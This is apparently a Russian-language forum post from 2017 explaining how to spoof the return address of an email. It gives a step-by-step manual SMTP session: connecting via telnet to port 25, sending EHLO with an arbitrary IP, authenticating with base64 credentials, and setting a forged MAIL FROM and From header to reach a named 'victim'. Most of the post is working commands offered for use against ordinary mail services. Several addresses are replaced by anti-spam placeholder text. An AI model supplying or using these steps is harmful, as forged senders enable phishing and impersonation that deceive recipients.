Подмена обратного адреса в email
Автор: Atrill 14.01.2017 18:19
Довольно давно обнаружил этот косяк, но не было времени выложить.
В принципе, он кому надо уже известен. Уязвимость заключается в
отсутствии проверки переданных данных с регистрационными в большинстве
почтовых сервисов. Для использования уязвимости требуется знать ESMTP
протокол и иметь шифровальщик base64, например в unix-based ОС часто
встречается утилита base64. Ну, не забываем и про php-функцию.
Коннектимся на порт SMTP
telnet mail.server.ru 25
представляемся:
EHLO 123.123.123.123
- наш ip. он тоже не проверяется - можно писать любую ахинею.
AUTH LOGIN base64login
base64password
где base64login - ваш логин, закодированный в base64.
base64password - пароль в 64
далее:
MAIL FROM
Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript
наш обратный адрес:
Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript
RCPT TO: i@looser.рф
адрес жертвы: i@looser.рф
Далее
DATA
после этого начинается тело письма
в теле письма пишется откуда оно пришло (повторно, кому предназначено,
в какой кодировке и т.д. и т.п.) Можно ограничиться From: и To:
To:
From:
Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript
>
Subject: hello, dude!
Где Subject - тема
когда тело закончено пишем перевод каретки, точку, перевод каретки:
.
т.е.
всё. Жертве приходит письмо с адреса, который мы указали.